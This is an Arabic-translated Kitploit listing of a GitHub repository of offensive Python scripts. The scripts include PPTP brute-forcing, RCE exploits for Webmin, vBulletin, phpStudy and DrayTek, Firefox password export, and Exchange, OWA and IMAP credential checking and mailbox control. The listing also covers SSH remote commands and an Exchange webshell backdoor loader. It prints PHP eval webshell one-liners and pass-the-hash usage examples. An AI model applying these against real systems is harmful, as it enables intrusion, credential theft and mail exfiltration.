Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Homework-of-Python — أكواد Python الخاصة بمدونتي. | Kitploit
أدوات/GitHubGitHub/3gstudent/homework-of-python
ماسحات الثغرات الأمنيةهجمات كلمات المرورالاستغلالاستغلال تطبيقات الويبجمع المعلوماتما بعد الاستغلالالفريق الأحمرتطوير الحمولات
GitHub3gstudent/homework-of-python

Homework-of-Python

أكواد Python الخاصة بمدونتي.

عرض المستودع
41212618منذ 3 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

واجبات-بايثون

أكواد بايثون من مدونتي.

pptp_password_hack.py

استخدم هجوم القوة الغاشمة (Brute-force) للحصول على كلمة مرور PPTP VPN.

سيقرأ كلمات المرور من ملف (يُسمى wordlist) ثم يستخدم pptpsetup للاتصال بالخادم.

الفاصل الزمني هو 10 ثوانٍ.


portscan.py

يُستخدم لفحص المنافذ.

مهلة الانتظار (timeout) هي 3 ثوانٍ.

نسخة c++:

https://github.com/3gstudent/Homework-of-C-Language/blob/master/portscan.cpp


urltoip.py

يُستخدم للحصول على عنوان IP من الرابط (URL).

يمكنني استخدام نتيجة Sublist3r مباشرة.

file_deduplication(For_urltoip).py

يُستخدم لإزالة عناوين IP المكررة من نتيجة Sublist3r.

يمكنني استخدام نتيجة urltoip.py مباشرة.

يمكن فرز عناوين IP باستخدام Sublime (F9).


file_deduplication.py

يُستخدم لإزالة العناصر المكررة من الملف.

Webmin<=1.920-Unauthenticated_RCE(CVE-2019-15107).py

المرجع:

https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html


fofa_api.py

يُستخدم لاستدعاء واجهة برمجة التطبيقات (API) الخاصة بـ fofa وطباعة عناوين IP من النتائج.

يمكنك الحصول على 100 نتيجة.

fofa_api_VIP.py

يُستخدم لاستدعاء واجهة برمجة التطبيقات (API) الخاصة بـ fofa وطباعة عناوين IP من النتائج.

إذا كنت من مستخدمي VIP، فستحصل على 10000 نتيجة.


vBulletin_5.x_0day_pre-auth_RCE.py

المرجع:

https://seclists.org/fulldisclosure/2019/Sep/31

مثال.

echo \<?php @eval\(\$_POST[pwd]\)\;?\> >test.php

phpStudy_5.2-5.45_(php_xmlrpc.dll)_backdoor_RCE.py

المرجع:

https://mp.weixin.qq.com/s/dTzWfYGdkNqEl0vd72oC2w

مثال.

system('cmd /c "echo ^<?php @eval(^$_POST[pwd]);?^> >D:\phpstudy\WWW\test.php"');

ExportFirefoxPassword.py

يُستخدم لتصدير كلمة مرور متصفح Firefox

get_Exchange_version.py

يُستخدم للحصول على إصدار Exchange.

أولاً احصل على BuildNumber من خلال الكود المصدري للرابط ثم احصل على الإصدار.

المرجع:

https://docs.microsoft.com/en-us/Exchange/new-features/build-numbers-and-release-dates?redirectedfrom=MSDN&view=exchserver-2019


SMBv3_RCE_Scanner(CVE-2020-0796).py

يُستخدم لفحص ثغرة SMBv3 RCE.

مهلة الانتظار (timeout) هي 3 ثوانٍ.


Unauthenticated_RCE_in_Draytek_Vigor2960\3900\300B.py

المرجع:

https://github.com/imjdl/CVE-2020-8515-PoC

CVE-2020-8515

أجهزة DrayTek Vigor2960 1.3.1_Beta وVigor3900 1.4.4_Beta وVigor300B 1.3.3_Beta و1.4.2.1_Beta و1.4.4_Beta تسمح بتنفيذ التعليمات البرمجية عن بُعد بصلاحيات root (بدون مصادقة) عبر الأحرف الوصفية للصدفة (shell metacharacters) في مسار cgi-bin/mainfunction.cgi URI..

المنتجات المتأثرة:

  • Vigor300B <v1.5.1
  • Vigor2960 <v1.5.1
  • Vigor3900 <v1.5.1

Zimbra_SOAP_API_Manage.py

استخدم واجهة برمجة تطبيقات Zimbra SOAP للاتصال بخادم بريد Zimbra.

الاستخدام:

      Zimbra_SOAP_API.py <url> <username> <password> <mode>

الوضع (mode):

  • low مصادقة للحصول على رمز منخفض الصلاحية (low token)
  • admin مصادقة للحصول على رمز المسؤول (admin token)
  • ssrf استخدم CVE-2019-9621 للحصول على رمز المسؤول

مثال:

      Zimbra_SOAP_API.py https://192.168.1.1 [email protected] password low

checkEWS.py

يُستخدم للتحقق من صحة حساب Exchange Web Service (يدعم plaintext وntlmhash)

المرجع:https://github.com/dirkjanm/PrivExchange/blob/master/privexchange.py

الاستخدام:

checkEWS.py <host> <port> <mode> <domain> <user> <password>
<mode>:
- plaintext
- ntlmhash

مثال.

checkEWS.py 192.168.1.1 443 plaintext test.com user1 password1
checkEWS.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1

checkAutodiscover.py

يُستخدم للوصول إلى Autodiscover.xml والحصول على إعدادات المستخدم (يدعم plaintext وntlmhash)

الاستخدام:

checkAutodiscover.py <host> <port> <mode> <email> <password> <command>
<command>:
- checkautodiscover
- getusersetting
- checkoab
- downloadlzx

مثال.

checkAutodiscover.py 192.168.1.1 443 plaintext [email protected] password1 checkaut
odiscover
checkAutodiscover.py test.com 80 ntlmhash [email protected] c5a237b7e9d8e708d8436b6
148a25fa1 getusersetting

checkAutodiscoverEx.py

وضع إضافي لـ checkAutodiscover.py

أضف معامل

ewsManage.py

يُستخدم للوصول إلى Exchange Web Service (يدعم plaintext وntlmhash)

الاستخدام:

ewsManage.py <host> <port> <mode> <domain> <user> <password> <command>
<mode>:
- plaintext
- ntlmhash
<command>:
- getfolderofinbox
- getfolderofsentitems
- listmailofinbox
- listmailofsentitems
- listmailoffolder
- getmail
- deletemail
- deletefolder
- getattachment
- saveattachment
- getdelegateofinbox
- adddelegateofinbox
- updatedelegateofinbox
- removedelegateofinbox
- getdelegateofinbox2
- updatedelegateofinbox2
- restoredelegateofinbox2
- getinboxrules
- updateinboxrules
- removeinboxrules
- deleteattachment
- createattachment
- createfolderofinbox
- listhiddenfolderofinbox
- createtestmail
- SetHiddenPropertyType
- UpdateHiddenPropertyType
- getcontact
- findpeople
- findallpeople
- resolvename
- resolveallname


مثال.

ewsManage.py 192.168.1.1 443 plaintext test.com user1 password1 getfolderofinbox
ewsManage.py test.com 80 ntlmhash test.com user1 c5a237b7e9d8e708d8436b6148a25fa1 listmailofinbox

sshCheck.py

يُستخدم للتحقق من صحة بيانات اعتماد SSH (يدعم كلمة المرور وملف المفتاح الخاص)

الاستخدام:

sshCheck.py <host> <port> <mode><user> <password>
<mode>:
- plaintext
- keyfile

مثال.

sshCheck.py 192.168.1.1 22 plaintext root toor
sshCheck.py 192.168.1.1 22 keyfile root id_rsa

sshRunCmd

تنفيذ الأوامر عن بُعد عبر SSH (يدعم كلمة المرور وملف المفتاح الخاص)

الاستخدام:

sshRunCmd.py <host> <port> <mode><user> <password> <cmd>
<mode>:
- plaintext
- keyfile
If the <cmd> is shell,you will get an interactive shell

مثال.

sshRunCmd.py 192.168.1.1 22 plaintext root toor shell
sshRunCmd.py 192.168.1.1 22 keyfile root id_rsa ps

easCheck.py

يُستخدم للتحقق من صحة بيانات اعتماد eas (Exchange Server ActiveSync)

الاستخدام:

easCheck.py <host> <user> <password>

مثال.

easCheck.py 192.168.1.1 user1 password1

checkOWA.py

يُستخدم للتحقق من صحة حساب Exchange عبر الاتصال بـ OWA.

الاستخدام:

checkOWA.py <url> <user> <password>

owaManage.py

يُستخدم لقراءة رسائل البريد عبر الاتصال بـ OWA.

الاستخدام:

owaManage.py  <url> <user> <password> <command>
<command>
- ListFolder
- ViewMail
- DownloadAttachment

imapManage.py

استخدم IMAP للاتصال بخادم البريد.

الاستخدام:

imapManage.py <IMAP server> <username> <password> <command>    
<command>:
CheckConfig             get the folder name
SaveAttachOfInbox       save the attachments of Inbox
SaveAttachOfSent        save the attachments of Sent
DownloadAllMailOfInbox  download all the mails of Inbox
DownloadAllMailOfSent   download all the mails of Sent
Eg:
imapManage.py 192.168.1.1 user1 password CheckConfig

aspxCmdNTLM.py

يُستخدم لتنفيذ مصادقة NTLM والتواصل مع execCmd.aspx

يتم ترميز بيانات الاتصال باستخدام Base64

الاستخدام:

aspxCmdNTLM.py <host> <port> <url> <mode> <domain> <user> <password> <command>
<mode>:
- plaintext
- ntlmhash
Eg.
aspxCmdNTLM.py 192.168.1.1 443 https://192.168.1.1/1.txt plaintext test.com user
1 password1 whoami
aspxCmdNTLM.py test.com 80 http://192.168.1.1/1.aspx ntlmhash test.com user1 c5a
237b7e9d8e708d8436b6148a25fa1 whoami

SharpExchangeBackdoor.py

نسخة C#: SharpExchangeBackdoor.cs

يُستخدم لإرسال الحمولة (payload) إلى الباب الخلفي لـ Exchange webshell.

يدعم:

  • assemblyLoad
  • webshellWrite

الاستخدام:

    <url> <user> <password> <mode> <path>
mode:
    assemblyLoad
    webshellWrite

مثال.

    SharpExchangeBackdoor.py https://192.168.1.1/owa/auth/errorFE.aspx no auth assemblyLoad payload.dll
    SharpExchangeBackdoor.py https://192.168.1.1/ecp/About.aspx user1 123456 webshellWrite payload.aspx

assemblyLoad.aspx:

تنزيل الأداة